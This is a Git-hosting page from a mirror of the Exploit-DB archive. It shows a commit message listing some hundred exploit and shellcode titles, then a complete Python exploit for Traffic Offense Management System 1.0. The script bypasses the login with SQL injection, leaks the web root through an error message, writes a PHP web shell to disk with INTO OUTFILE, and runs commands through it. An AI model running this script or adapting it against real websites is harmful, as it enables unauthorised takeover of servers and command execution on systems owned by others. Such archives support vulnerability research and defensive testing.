bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50244.py
Offensive Security de260aeac6 DB: 2021-10-30 
95 changes to exploits/shellcodes

Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
Sandboxie 5.49.7 - Denial of Service (PoC)
WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
iDailyDiary 4.30 - Denial of Service (PoC)
RarmaRadio 2.72.8 - Denial of Service (PoC)
DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
Color Notes 1.4 - Denial of Service (PoC)
Macaron Notes great notebook 5.5 - Denial of Service (PoC)
My Notes Safe 5.3 - Denial of Service (PoC)

n+otes 1.6.2 - Denial of Service (PoC)

Telegram Desktop 2.9.2 - Denial of Service (PoC)

Mini-XML 3.2 - Heap Overflow
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

MariaDB 10.2 - 'wsrep_provider' OS Command Execution

Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free

Visual Studio Code 1.47.1 - Denial of Service (PoC)

DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)

MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)

Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)

GNU Wget < 1.18 - Arbitrary File Upload (2)

WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)

E-Learning System 1.0 - Authentication Bypass

PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting

GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting

EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting

Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)

Library System 1.0 - Authentication Bypass

Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting

Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)

GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery

GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)

Umbraco v8.14.1 - 'baseUrl' SSRF

Cacti 1.2.12 - 'filter' SQL Injection

GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery

Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)
Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting
Xmind 2020 - Persistent Cross-Site Scripting
Tagstoo 2.0.1 - Persistent Cross-Site Scripting
SnipCommand 0.1.0 - Persistent Cross-Site Scripting
Moeditor 0.2.0 - Persistent Cross-Site Scripting
Marky 0.0.1 - Persistent Cross-Site Scripting
StudyMD 0.3.2 - Persistent Cross-Site Scripting
Freeter 1.2.1 - Persistent Cross-Site Scripting
Markright 1.0 - Persistent Cross-Site Scripting
Markdownify 1.2.0 - Persistent Cross-Site Scripting
Anote 1.0 - Persistent Cross-Site Scripting
Subrion CMS 4.2.1 - Arbitrary File Upload
Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection

Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)

Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)

CHIYU IoT Devices - Denial of Service (DoS)

Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)

TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal

Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)

Scratch Desktop 3.17 - Remote Code Execution

Church Management System 1.0 - Arbitrary File Upload (Authenticated)

Phone Shop Sales Managements System 1.0 - Arbitrary File Upload

Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)

WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting

ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)

KevinLAB BEMS 1.0 - Authentication Bypass

Event Registration System with QR Code 1.0 - Authentication Bypass

CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)

Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)

qdPM 9.2 - Password Exposure (Unauthenticated)
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)
Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)

GeoVision Geowebserver 5.3.3 - Local FIle Inclusion

Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)

Umbraco CMS 8.9.1 - Directory Traversal

Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Dolibarr ERP 14.0.1 - Privilege Escalation

Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

Phpwcms 1.9.30 - Arbitrary File Upload

Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)
Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)
Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
2021-10-30 05:02:09 +00:00

73 lines
No EOL
2.4 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux
import requests
import random
import string
import json
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
session = requests.session()
print("Login Bypass\n")
request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":
print("Finding first driver\n")
getHTML = session.get(url + "admin/?page=drivers")
getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
print("Found firs driver ID : " + findFirstDriverID)
print("\nFinding path")
findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"
print("\nFound Path : " + findPath)
shellPath = findPath[findPath.index("admin/"):len(findPath)]
SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)
print("\nShell Path : " + url+shellPath+shellname+".php")
shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
else:
print("No bypass user")
Reference in a new issue View git blame Copy permalink